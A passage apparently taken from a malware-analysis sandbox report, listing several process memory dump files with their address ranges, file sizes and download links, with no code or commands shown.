                              Filesize

                              8KB

                              Download

                            • memory/3568-61-0x00007FFBC2360000-0x00007FFBC2E21000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/3568-10-0x0000015BEB250000-0x0000015BEB272000-memory.dmp

                              Filesize

                              136KB

                              Download

                            • memory/4024-58-0x0000000000C00000-0x000000000476E000-memory.dmp

                              Filesize

                              59.4MB

                              Download